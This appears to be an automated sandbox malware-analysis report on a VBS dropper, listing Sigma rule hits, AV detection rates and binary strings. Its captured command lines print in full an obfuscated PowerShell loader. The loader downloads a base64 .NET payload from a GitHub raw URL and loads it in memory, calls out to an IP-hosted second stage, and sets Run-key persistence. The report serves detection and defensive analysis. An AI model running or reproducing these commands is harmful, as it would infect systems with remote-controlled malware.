Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnUjFsJysndXJsID0gJysnUUxlJysnaHR0cCcrJ3M6Ly8nKydyYScrJ3cnKycuZ2l0aCcrJ3UnKydidXNlcmNvbnRlbnQnKycuY28nKydtL05vRGV0ZWN0T24vTm9EZXQnKydlJysnYycrJ3RPbi9yJysnZWZzL2hlYWRzLycrJ20nKydhaW4vRGV0YWhOb3RoLScrJ1YudHgnKyd0UUxlOyBSMWxiYXNlNjRDbycrJ24nKyd0ZW50ID0gKE5ldy1PYmonKydlY3QgU3lzdGUnKydtLk5lJysndCcrJy4nKydXZScrJ2JDJysnbGknKydlbnQpLkRvdycrJ25sb2FkJysnU3RyaW4nKydnJysnKFInKycxbHVyJysnbCk7JysnIFIxbGJpbicrJ2FyeScrJ0MnKydvbnRlbnQnKycgJysnPSBbU3lzdCcrJ2VtLicrJ0NvbnZlcnRdOjpGcicrJ29tQicrJ2FzZTY0U3RyJysnaW4nKydnKFIxbGJhc2U2NCcrJ0NvbnQnKydlbicrJ3QpJysnOyBSJysnMWwnKydhc3MnKydlbWInKydseSA9IFtSZWYnKydsJysnZWN0aW9uLkEnKydzJysnc2UnKydtYmx5XTo6TCcrJ29hZCgnKydSMWxiaW5hJysncnlDb250JysnZW50KTsgJysnWycrJ2RubGliJysnLklPJysnLkgnKydvbWVdJysnOjonKydWQUkoZHprdHh0LicrJ0dGQ1JSLzAnKyc1NC8zJysnNS4zNC4nKyc1LjInKyc3Ly86cHR0aCcrJ2R6aycrJywgZHprJysnMWR6aycrJywgJysnZHprJysnQzprJysnc2gnKydQcm9ncicrJ2FtRGF0YWtzaGR6aywgZHprYXV0b3AnKydhdGlhZCcrJ3prLCcrJyBkemsnKydSZWcnKydBc21keicrJ2ssIGQnKyd6a2QnKyd6aycrJyxkJysnemtkJysnemspJyktUkVQTEFDZSAgKFtjaEFyXTEwMCtbY2hBcl0xMjIrW2NoQXJdMTA3KSxbY2hBcl0zNCAtUkVQTEFDZSAna3NoJyxbY2hBcl05Mi1DUkVwbEFDZSAgKFtjaEFyXTgyK1tjaEFyXTQ5K1tjaEFyXTEwOCksW2NoQXJdMzYgLVJFUExBQ2UnUUxlJyxbY2hBcl0zOSl8ICYoIChbc3RySU5nXSR2ZXJCT1NlUHJlZkVSRW5jZSlbMSwzXSsneCctak9JbicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnUjFsJysndXJsID0gJysnUUxlJysnaHR0cCcrJ3M6Ly8nKydyYScrJ3cnKycuZ2l0aCcrJ3UnKydidXNlcmNvbnRlbnQnKycuY28nKydtL05vRGV0ZWN0T24vTm9EZXQnKydlJysnYycrJ3RPbi9yJysnZWZzL2hlYWRzLycrJ20nKydhaW4vRGV0YWhOb3RoLScrJ1YudHgnKyd0UUxlOyBSMWxiYXNlNjRDbycrJ24nKyd0ZW50ID0gKE5ldy1PYmonKydlY3QgU3lzdGUnKydtLk5lJysndCcrJy4nKydXZScrJ2JDJysnbGknKydlbnQpLkRvdycrJ25sb2FkJysnU3RyaW4nKydnJysnKFInKycxbHVyJysnbCk7JysnIFIxbGJpbicrJ2FyeScrJ0MnKydvbnRlbnQnKycgJysnPSBbU3lzdCcrJ2VtLicrJ0NvbnZlcnRdOjpGcicrJ29tQicrJ2FzZTY0U3RyJysnaW4nKydnKFIxbGJhc2U2NCcrJ0NvbnQnKydlbicrJ3QpJysnOyBSJysnMWwnKydhc3MnKydlbWInKydseSA9IFtSZWYnKydsJysnZWN0aW9uLkEnKydzJysnc2UnKydtYmx5XTo6TCcrJ29hZCgnKydSMWxiaW5hJysncnlDb250JysnZW50KTsgJysnWycrJ2RubGliJysnLklPJysnLkgnKydvbWVdJysnOjonKydWQUkoZHprdHh0LicrJ0dGQ1JSLzAnKyc1NC8zJysnNS4zNC4nKyc1LjInKyc3Ly86cHR0aCcrJ2R6aycrJywgZHprJysnMWR6aycrJywgJysnZHprJysnQzprJysnc2gnKydQcm9ncicrJ2FtRGF0YWtzaGR6aywgZHprYXV0b3AnKydhdGlhZCcrJ3prLCcrJyBkemsnKydSZWcnKydBc21keicrJ2ssIGQnKyd6a2QnKyd6aycrJyxkJysnemtkJysnemspJyktUkVQTEFDZSAgKFtjaEFyXTEwMCtbY2hBcl0xMjIrW2NoQXJdMTA3KSxbY2hBcl0zNCAtUkVQTEFDZSAna3NoJyxbY2hBcl05Mi1DUkVwbEFDZSAgKFtjaEFyXTgyK1tjaEFyXTQ5K1tjaEFyXTEwOCksW2NoQXJdMzYgLVJFUExBQ2UnUUxlJyxbY2hBcl0zOSl8ICYoIChbc3RySU5nXSR2ZXJCT1NlUHJlZkVSRW5jZSlbMSwzXSsneCctak9JbicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powe
Sigma detected: WScript or CScript Dropper
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\WW8kzvnphl.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\WW8kzvnphl.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\WW8kzvnphl.vbs", ProcessId: 7412, ProcessName: wscript.exe
Sigma detected: Change PowerShell Policies to an Insecure Level
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnUjFsJysndXJsID0gJysnUUxlJysnaHR0cCcrJ3M6Ly8nKydyYScrJ3cnKycuZ2l0aCcrJ3UnKydidXNlcmNvbnRlbnQnKycuY28nKydtL05vRGV0ZWN0T24vTm9EZXQnKydlJysnYycrJ3RPbi9yJysnZWZzL2hlYWRzLycrJ20nKydhaW4vRGV0YWhOb3RoLScrJ1YudHgnKyd0UUxlOyBSMWxiYXNlNjRDbycrJ24nKyd0ZW50ID0gKE5ldy1PYmonKydlY3QgU3lzdGUnKydtLk5lJysndCcrJy4nKydXZScrJ2JDJysnbGknKydlbnQpLkRvdycrJ25sb2FkJysnU3RyaW4nKydnJysnKFInKycxbHVyJysnbCk7JysnIFIxbGJpbicrJ2FyeScrJ0MnKydvbnRlbnQnKycgJysnPSBbU3lzdCcrJ2VtLicrJ0NvbnZlcnRdOjpGcicrJ29tQicrJ2FzZTY0U3RyJysnaW4nKydnKFIxbGJhc2U2NCcrJ0NvbnQnKydlbicrJ3QpJysnOyBSJysnMWwnKydhc3MnKydlbWInKydseSA9IFtSZWYnKydsJysnZWN0aW9uLkEnKydzJysnc2UnKydtYmx5XTo6TCcrJ29hZCgnKydSMWxiaW5hJysncnlDb250JysnZW50KTsgJysnWycrJ2RubGliJysnLklPJysnLkgnKydvbWVdJysnOjonKydWQUkoZHprdHh0LicrJ0dGQ1JSLzAnKyc1NC8zJysnNS4zNC4nKyc1LjInKyc3Ly86cHR0aCcrJ2R6aycrJywgZHprJysnMWR6aycrJywgJysnZHprJysnQzprJysnc2gnKydQcm9ncicrJ2FtRGF0YWtzaGR6aywgZHprYXV0b3AnKydhdGlhZCcrJ3prLCcrJyBkemsnKydSZWcnKydBc21keicrJ2ssIGQnKyd6a2QnKyd6aycrJyxkJysnemtkJysnemspJyktUkVQTEFDZSAgKFtjaEFyXTEwMCtbY2hBcl0xMjIrW2NoQXJdMTA3KSxbY2hBcl0zNCAtUkVQTEFDZSAna3NoJyxbY2hBcl05Mi1DUkVwbEFDZSAgKFtjaEFyXTgyK1tjaEFyXTQ5K1tjaEFyXTEwOCksW2NoQXJdMzYgLVJFUExBQ2UnUUxlJyxbY2hBcl0zOSl8ICYoIChbc3RySU5nXSR2ZXJCT1NlUHJlZkVSRW5jZSlbMSwzXSsneCctak9JbicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnUjFsJysndXJsID0gJysnUUxlJysnaHR0cCcrJ3M6Ly8nKydyYScrJ3cnKycuZ2l0aCcrJ3UnKydidXNlcmNvbnRlbnQnKycuY28nKydtL05vRGV0ZWN0T24vTm9EZXQnKydlJysnYycrJ3RPbi9yJysnZWZzL2hlYWRzLycrJ20nKydhaW4vRGV0YWhOb3RoLScrJ1YudHgnKyd0UUxlOyBSMWxiYXNlNjRDbycrJ24nKyd0ZW50ID0gKE5ldy1PYmonKydlY3QgU3lzdGUnKydtLk5lJysndCcrJy4nKydXZScrJ2JDJysnbGknKydlbnQpLkRvdycrJ25sb2FkJysnU3RyaW4nKydnJysnKFInKycxbHVyJysnbCk7JysnIFIxbGJpbicrJ2FyeScrJ0MnKydvbnRlbnQnKycgJysnPSBbU3lzdCcrJ2VtLicrJ0NvbnZlcnRdOjpGcicrJ29tQicrJ2FzZTY0U3RyJysnaW4nKydnKFIxbGJhc2U2NCcrJ0NvbnQnKydlbicrJ3QpJysnOyBSJysnMWwnKydhc3MnKydlbWInKydseSA9IFtSZWYnKydsJysnZWN0aW9uLkEnKydzJysnc2UnKydtYmx5XTo6TCcrJ29hZCgnKydSMWxiaW5hJysncnlDb250JysnZW50KTsgJysnWycrJ2RubGliJysnLklPJysnLkgnKydvbWVdJysnOjonKydWQUkoZHprdHh0LicrJ0dGQ1JSLzAnKyc1NC8zJysnNS4zNC4nKyc1LjInKyc3Ly86cHR0aCcrJ2R6aycrJywgZHprJysnMWR6aycrJywgJysnZHprJysnQzprJysnc2gnKydQcm9ncicrJ2FtRGF0YWtzaGR6aywgZHprYXV0b3AnKydhdGlhZCcrJ3prLCcrJyBkemsnKydSZWcnKydBc21keicrJ2ssIGQnKyd6a2QnKyd6aycrJyxkJysnemtkJysnemspJyktUkVQTEFDZSAgKFtjaEFyXTEwMCtbY2hBcl0xMjIrW2NoQXJdMTA3KSxbY2hBcl0zNCAtUkVQTEFDZSAna3NoJyxbY2hBcl05Mi1DUkVwbEFDZSAgKFtjaEFyXTgyK1tjaEFyXTQ5K1tjaEFyXTEwOCksW2NoQXJdMzYgLVJFUExBQ2UnUUxlJyxbY2hBcl0zOSl8ICYoIChbc3RySU5nXSR2ZXJCT1NlUHJlZkVSRW5jZSlbMSwzXSsneCctak9JbicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powe
Sigma detected: CurrentVersion Autorun Keys Modification
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\ProgramData\autopatia.vbs, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7628, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Path
Sigma detected: Suspicious Copy From or To System Directory
Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\autopatia.vbs", CommandLine: "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\autopatia.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('R1l'+'url = '+'QLe'+'http'+'s://'+'ra'+'w'+'.gith'+'u'+'busercontent'+'.co'+'m/NoDetectOn/NoDet'+'e'+'c'+'tOn/r'+'efs/heads/'+'m'+'ain/DetahNoth-'+'V.tx'+'tQLe; R1lbase64Co'+'n'+'tent = (New-Obj'+'ect Syste'+'m.Ne'+'t'+'.'+'We'+'bC'+'li'+'ent).Dow'+'nload'+'Strin'+'g'+'(R'+'1lur'+'l);'+' R1lbin'+'ary'+'C'+'ontent'+' '+'= [Syst'+'em.'+'Convert]::Fr'+'omB'+'ase64Str'+'in'+'g(R1lbase64'+'Cont'+'en'+'t)'+'; R'+'1l'+'ass'+'emb'+'ly = [Ref'+'l'+'ection.A'+'s'+'se'+'mbly]::L'+'oad('+'R1lbina'+'ryCont'+'ent); '+'['+'dnlib'+'.IO'+'.H'+'ome]'+'::'+'VAI(dzktxt.'+'GFCRR/0'+'54/3'+'5.34.'+'5.2'+'7//:ptth'+'dzk'+', dzk'+'1dzk'+', '+'dzk'+'C:k'+'sh'+'Progr'+'amDatakshdzk, dzkautop'+'atiad'+'zk,'+' dzk'+'Reg'+'Asmdz'+'k, d'+'zkd'+'zk'+',d'+'zkd'+'zk)')-REPLACe ([chAr]100+[chAr]122+[chAr]107),[chAr]34 -REPLACe 'ksh',[chAr]92-CREplACe ([chAr]82+[chAr]49+[chAr]108),[chAr]36 -REPLACe'QLe',[chAr]39)| &( ([strINg]$verBOSePrefEREnce)[1,3]+'x'-jOIn'')", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7628, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\autopatia.vbs", ProcessId: 7740, ProcessName: cmd.exe
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\WW8kzvnphl.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\WW8kzvnphl.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\WW8kzvnphl.vbs", ProcessId: 7412, ProcessName: wscript.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnUjFsJysndXJsID0gJysnUUxlJysnaHR0cCcrJ3M6Ly8nKydyYScrJ3cnKycuZ2l0aCcrJ3UnKydidXNlcmNvbnRlbnQnKycuY28nKydtL05vRGV0ZWN0T24vTm9EZXQnKydlJysnYycrJ3RPbi9yJysnZWZzL2hlYWRzLycrJ20nKydhaW4vRGV0YWhOb3RoLScrJ1YudHgnKyd0UUxlOyBSMWxiYXNlNjRDbycrJ24nKyd0ZW50ID0gKE5ldy1PYmonKydlY3QgU3lzdGUnKydtLk5lJysndCcrJy4nKydXZScrJ2JDJysnbGknKydlbnQpLkRvdycrJ25sb2FkJysnU3RyaW4nKydnJysnKFInKycxbHVyJysnbCk7JysnIFIxbGJpbicrJ2FyeScrJ0MnKydvbnRlbnQnKycgJysnPSBbU3lzdCcrJ2VtLicrJ0NvbnZlcnRdOjpGcicrJ29tQicrJ2FzZTY0U3RyJysnaW4nKydnKFIxbGJhc2U2NCcrJ0NvbnQnKydlbicrJ3QpJysnOyBSJysnMWwnKydhc3MnKydlbWInKydseSA9IFtSZWYnKydsJysnZWN0aW9uLkEnKydzJysnc2UnKydtYmx5XTo6TCcrJ29hZCgnKydSMWxiaW5hJysncnlDb250JysnZW50KTsgJysnWycrJ2RubGliJysnLklPJysnLkgnKydvbWVdJysnOjonKydWQUkoZHprdHh0LicrJ0dGQ1JSLzAnKyc1NC8zJysnNS4zNC4nKyc1LjInKyc3Ly86cHR0aCcrJ2R6aycrJywgZHprJysnMWR6aycrJywgJysnZHprJysnQzprJysnc2gnKydQcm9ncicrJ2FtRGF0YWtzaGR6aywgZHprYXV0b3AnKydhdGlhZCcrJ3prLCcrJyBkemsnKydSZWcnKydBc21keicrJ2ssIGQnKyd6a2QnKyd6aycrJyxkJysnemtkJysnemspJyktUkVQTEFDZSAgKFtjaEFyXTEwMCtbY2hBcl0xMjIrW2NoQXJdMTA3KSxbY2hBcl0zNCAtUkVQTEFDZSAna3NoJyxbY2hBcl05Mi1DUkVwbEFDZSAgKFtjaEFyXTgyK1tjaEFyXTQ5K1tjaEFyXTEwOCksW2NoQXJdMzYgLVJFUExBQ2UnUUxlJyxbY2hBcl0zOSl8ICYoIChbc3RySU5nXSR2ZXJCT1NlUHJlZkVSRW5jZSlbMSwzXSsneCctak9JbicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnUjFsJysndXJsID0gJysnUUxlJysnaHR0cCcrJ3M6Ly8nKydyYScrJ3cnKycuZ2l0aCcrJ3UnKydidXNlcmNvbnRlbnQnKycuY28nKydtL05vRGV0ZWN0T24vTm9EZXQnKydlJysnYycrJ3RPbi9yJysnZWZzL2hlYWRzLycrJ20nKydhaW4vRGV0YWhOb3RoLScrJ1YudHgnKyd0UUxlOyBSMWxiYXNlNjRDbycrJ24nKyd0ZW50ID0gKE5ldy1PYmonKydlY3QgU3lzdGUnKydtLk5lJysndCcrJy4nKydXZScrJ2JDJysnbGknKydlbnQpLkRvdycrJ25sb2FkJysnU3RyaW4nKydnJysnKFInKycxbHVyJysnbCk7JysnIFIxbGJpbicrJ2FyeScrJ0MnKydvbnRlbnQnKycgJysnPSBbU3lzdCcrJ2VtLicrJ0NvbnZlcnRdOjpGcicrJ29tQicrJ2FzZTY0U3RyJysnaW4nKydnKFIxbGJhc2U2NCcrJ0NvbnQnKydlbicrJ3QpJysnOyBSJysnMWwnKydhc3MnKydlbWInKydseSA9IFtSZWYnKydsJysnZWN0aW9uLkEnKydzJysnc2UnKydtYmx5XTo6TCcrJ29hZCgnKydSMWxiaW5hJysncnlDb250JysnZW50KTsgJysnWycrJ2RubGliJysnLklPJysnLkgnKydvbWVdJysnOjonKydWQUkoZHprdHh0LicrJ0dGQ1JSLzAnKyc1NC8zJysnNS4zNC4nKyc1LjInKyc3Ly86cHR0aCcrJ2R6aycrJywgZHprJysnMWR6aycrJywgJysnZHprJysnQzprJysnc2gnKydQcm9ncicrJ2FtRGF0YWtzaGR6aywgZHprYXV0b3AnKydhdGlhZCcrJ3prLCcrJyBkemsnKydSZWcnKydBc21keicrJ2ssIGQnKyd6a2QnKyd6aycrJyxkJysnemtkJysnemspJyktUkVQTEFDZSAgKFtjaEFyXTEwMCtbY2hBcl0xMjIrW2NoQXJdMTA3KSxbY2hBcl0zNCAtUkVQTEFDZSAna3NoJyxbY2hBcl05Mi1DUkVwbEFDZSAgKFtjaEFyXTgyK1tjaEFyXTQ5K1tjaEFyXTEwOCksW2NoQXJdMzYgLVJFUExBQ2UnUUxlJyxbY2hBcl0zOSl8ICYoIChbc3RySU5nXSR2ZXJCT1NlUHJlZkVSRW5jZSlbMSwzXSsneCctak9JbicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powe
Sigma detected: Potential Encoded PowerShell Patterns In CommandLine
Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('R1l'+'url = '+'QLe'+'http'+'s://'+'ra'+'w'+'.gith'+'u'+'busercontent'+'.co'+'m/NoDetectOn/NoDet'+'e'+'c'+'tOn/r'+'efs/heads/'+'m'+'ain/DetahNoth-'+'V.tx'+'tQLe; R1lbase64Co'+'n'+'tent = (New-Obj'+'ect Syste'+'m.Ne'+'t'+'.'+'We'+'bC'+'li'+'ent).Dow'+'nload'+'Strin'+'g'+'(R'+'1lur'+'l);'+' R1lbin'+'ary'+'C'+'ontent'+' '+'= [Syst'+'em.'+'Convert]::Fr'+'omB'+'ase64Str'+'in'+'g(R1lbase64'+'Cont'+'en'+'t)'+'; R'+'1l'+'ass'+'emb'+'ly = [Ref'+'l'+'ection.A'+'s'+'se'+'mbly]::L'+'oad('+'R1lbina'+'ryCont'+'ent); '+'['+'dnlib'+'.IO'+'.H'+'ome]'+'::'+'VAI(dzktxt.'+'GFCRR/0'+'54/3'+'5.34.'+'5.2'+'7//:ptth'+'dzk'+', dzk'+'1dzk'+', '+'dzk'+'C:k'+'sh'+'Progr'+'amDatakshdzk, dzkautop'+'atiad'+'zk,'+' dzk'+'Reg'+'Asmdz'+'k, d'+'zkd'+'zk'+',d'+'zkd'+'zk)')-REPLACe ([chAr]100+[chAr]122+[chAr]107),[chAr]34 -REPLACe 'ksh',[chAr]92-CREplACe ([chAr]82+[chAr]49+[chAr]108),[chAr]36 -REPLACe'QLe',[chAr]39)| &( ([strINg]$verBOSePrefEREnce)[1,3]+'x'-jOIn'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('R1l'+'url = '+'QLe'+'http'+'s://'+'ra'+'w'+'.gith'+'u'+'busercontent'+'.co'+'m/NoDetectOn/NoDet'+'e'+'c'+'tOn/r'+'efs/heads/'+'m'+'ain/DetahNoth-'+'V.tx'+'tQLe; R1lbase64Co'+'n'+'tent = (New-Obj'+'ect Syste'+'m.Ne'+'t'+'.'+'We'+'bC'+'li'+'ent).Dow'+'nload'+'Strin'+'g'+'(R'+'1lur'+'l);'+' R1lbin'+'ary'+'C'+'ontent'+' '+'= [Syst'+'em.'+'Convert]::Fr'+'omB'+'ase64Str'+'in'+'g(R1lbase64'+'Cont'+'en'+'t)'+'; R'+'1l'+'ass'+'emb'+'ly = [Ref'+'l'+'ection.A'+'s'+'se'+'mbly]::L'+'oad('+'R1lbina'+'ryCont'+'ent); '+'['+'dnlib'+'.IO'+'.H'+'ome]'+'::'+'VAI(dzktxt.'+'GFCRR/0'+'54/3'+'5.34.'+'5.2'+'7//:ptth'+'dzk'+', dzk'+'1dzk'+', '+'dzk'+'C:k'+'sh'+'Progr'+'amDatakshdzk, dzkautop'+'atiad'+'zk,'+' dzk'+'Reg'+'Asmdz'+'k, d'+'zkd'+'zk'+',d'+'zkd'+'zk)')-REPLACe ([chAr]100+[chAr]122+[chAr]107),[chAr]34 -REPLACe 'ksh',[chAr]92-CREplACe ([chAr]82+[chAr]49+[chAr]108),[chAr]36 -REPLACe'QLe',[chAr]39)| &( ([strINg]$verBOSePrefEREnce)[1,3]+'x'-jOIn'')", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnUjFsJysndXJsID0gJysnUUxlJysnaHR0cCcrJ3M6Ly8nKydyYScrJ3cnKycuZ2l0aCcrJ3UnKydidXNlcmNvbnRlbnQnKycuY28nKydtL05vRGV0ZWN0T24vTm9EZXQnKydlJysnYycrJ3RPbi9yJysnZWZzL2hlYWRzLycrJ20nKydhaW4vRGV0YWhOb3RoLScrJ1YudHgnKyd0UUxlOyBSMWxiYXNlNjRDbycrJ24nKyd0ZW50ID0gKE5ldy1PYmonKydlY3QgU3lzdGUnKydtLk5lJysndCcrJy4nKydXZScrJ2JDJysnbGknKydlbnQpLkRvdycrJ25sb2FkJysnU3RyaW4nKydnJysnKFInKycxbHVyJysnbCk7JysnIFIxbGJpbicrJ2FyeScrJ0MnKydvbnRlbnQnKycgJysnPSBbU3lzdCcrJ2VtLicrJ0NvbnZlcnRdO

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for domain / URL
Source: https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txtVirustotal: Detection: 6%Perma Link
Multi AV Scanner detection for submitted file
Source: WW8kzvnphl.vbsReversingLabs: Detection: 13%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.9% probability
Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb[ source: powershell.exe, 00000003.00000002.2203709649.0000022A9B821000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000003.00000002.2211606771.00007FFD9BC50000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: m.Core.pdbpdb` source: powershell.exe, 00000003.00000002.2202319158.0000022A9B4E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
